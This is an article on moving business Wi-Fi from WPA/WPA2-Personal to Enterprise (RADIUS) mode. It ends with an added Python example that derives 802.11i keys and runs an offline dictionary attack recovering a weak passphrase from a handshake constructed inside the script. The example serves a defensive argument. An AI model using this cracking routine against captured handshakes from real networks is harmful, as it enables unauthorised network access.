
Moving to WPA/WPA2-Enterprise Wi-Fi Encryption

Article Description

Wi-Fi networks in businesses (no matter how small) should be using the Enterprise mode of WPA or WPA2 encryption. Eric Geier, the author of Wi-Fi Hotspots: Setting Up Public Wireless Internet Access, shows you how to move from the Personal (PSK) mode to the Enterprise (RADIUS) mode.

As you may already know, Wired Equivalent Privacy (WEP) is not secure. This first wireless LAN security standard, developed by the IEEE, has been crackable for nearly a decade now: its static RC4 keys can be recovered from a modest amount of captured traffic with freely available tools.

In 2003, the Wi-Fi Alliance released a replacement security standard called Wi-Fi Protected Access. The first version (WPA), which uses TKIP with the RC4 cipher, has taken some hits from researchers, but it has not been fully broken and can still offer reasonable protection. TKIP is now deprecated, though, and should be used only where older client hardware cannot do better.

The second version (WPA2), released in mid-2004, is the one to aim for: it fully implements the IEEE 802.11i security standard with CCMP/AES encryption and does not share TKIP's weaknesses.

In this article, we'll look at the two very different modes of Wi-Fi Protected Access and see how and why you'd want to move from the easy-to-use Personal mode to the Enterprise mode.

Now let's get started!

Two Modes of WPA/WPA2: Personal (PSK) versus Enterprise

Both versions of Wi-Fi Protected Access (WPA/WPA2) can be implemented in either of two modes:

  • Personal or Pre-Shared Key (PSK) Mode: This mode is appropriate for most home networks, but not for business networks. You define an encryption passphrase on the wireless router and any other access points (APs). Users must then enter that passphrase when connecting to the Wi-Fi network.

    Though this mode seems very easy to implement, it makes properly securing a business network nearly impossible. Unlike with the Enterprise mode, wireless access can't be individually or centrally managed: one passphrase applies to all users. If that global passphrase needs to be changed, it must be changed manually on every AP and every computer. That is a big headache exactly when you can least afford it; for instance, when an employee leaves the company or when a computer is stolen or compromised.

    Also unlike the Enterprise mode, the encryption passphrase is stored on the computers. Anyone with access to a computer, whether an employee or a thief, can connect to the network and also recover the passphrase. And because the network key (the PMK) is derived only from the passphrase and the SSID, anyone who captures a client's initial handshake can test passphrase guesses offline at leisure, so a short or dictionary-word passphrase offers little protection even when it is kept from users.

  • Enterprise (EAP/RADIUS) Mode: This mode provides the security needed for wireless networks in business environments. Though more complicated to set up, it offers individualized and centralized control over access to your Wi-Fi network. Users (or their devices) are assigned login credentials, such as a username and password or a certificate, that they must present when connecting, and administrators can modify or revoke those credentials at any time.

    Users never deal with the actual encryption keys. After a user authenticates, a fresh master key for that session is derived from the EAP exchange in the background, and the per-packet keys are derived from it. There is no shared network key to recover from a computer, and no passphrase for an attacker who sniffs the handshake to guess.
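The following example is added here to make the difference concrete; it is not code from the article or from any vendor. It derives the Personal-mode PMK exactly as IEEE 802.11i specifies (PBKDF2-HMAC-SHA1 over the passphrase and SSID, 4096 rounds), expands it to the pairwise transient key with the 802.11i PRF-512, and then runs the offline dictionary attack an eavesdropper can mount against a sniffed 4-way handshake. The handshake itself (MAC addresses, nonces, and a simplified EAPOL-Key message 2 body) is constructed in the script rather than captured, and the Enterprise-mode MSK is a random stand-in for what an EAP method such as EAP-TLS would produce. Only the Python standard library is used.

```python
"""Shared PSK-derived keys versus per-session Enterprise keys.

Added example, not part of the original article. Key derivation follows
IEEE 802.11i; the "captured" handshake below is constructed locally.
"""
import hashlib
import hmac
import os


def psk_pmk(passphrase: str, ssid: str) -> bytes:
    """Personal mode: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32 bytes).
    Every client on the network derives this same value from the same passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def enterprise_pmk(msk: bytes) -> bytes:
    """Enterprise mode: PMK = first 256 bits of the EAP Master Session Key.
    The EAP method produces a fresh MSK per authentication; no passphrase exists."""
    return msk[:32]


def prf512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenate HMAC-SHA1(key, label||0x00||data||i), i = 0..3."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs and nonces)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """EAPOL-Key MIC for the CCMP (AKM 2) case: HMAC-SHA1 with the KCK, truncated to 16 bytes.
    The frame is MIC'd with its MIC field set to zero."""
    return hmac.new(kck, frame, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: str, ssid: str) -> dict:
    """Constructed stand-in for a passively sniffed 4-way handshake message 2.
    An attacker needs only the two MAC addresses, both nonces and the MIC'd frame."""
    aa = bytes.fromhex("001122334455")   # AP MAC address (constructed)
    spa = bytes.fromhex("66778899aabb")  # client MAC address (constructed)
    anonce, snonce = os.urandom(32), os.urandom(32)
    # Simplified EAPOL-Key body: descriptor type, key info, SNonce, zeroed MIC field.
    frame = b"\x02" + b"\x01\x0a" + snonce + b"\x00" * 16
    kck = derive_ptk(psk_pmk(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return {"aa": aa, "spa": spa, "anonce": anonce, "snonce": snonce,
            "frame": frame, "mic": eapol_mic(kck, frame)}


def crack_psk(capture: dict, ssid: str, wordlist):
    """Offline dictionary attack: re-derive PMK -> PTK -> MIC per guess and compare.
    Works only because the PMK depends on nothing but the shared passphrase and SSID."""
    for guess in wordlist:
        ptk = derive_ptk(psk_pmk(guess, ssid), capture["aa"], capture["spa"],
                         capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["frame"]), capture["mic"]):
            return guess
    return None


if __name__ == "__main__":
    ssid = "IEEE"
    cap = capture_handshake("password", ssid)  # weak passphrase, constructed
    print("Personal:   recovered passphrase =", crack_psk(cap, ssid, ["letmein", "password"]))
    # Enterprise: each session's PMK comes from the EAP exchange; there is nothing to guess.
    s1, s2 = enterprise_pmk(os.urandom(64)), enterprise_pmk(os.urandom(64))
    print("Enterprise: two sessions share a PMK?", s1 == s2)
```

The PBKDF2 step is deliberately slow (4096 rounds per guess), but that only buys a few thousand guesses per second per core of resistance; a passphrase that appears in any wordlist will fall. Note also that the SSID is the salt, so a default or common SSID lets an attacker precompute PMKs for many networks at once. In Enterprise mode none of this applies, because the per-session key is never a function of a human-chosen secret.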
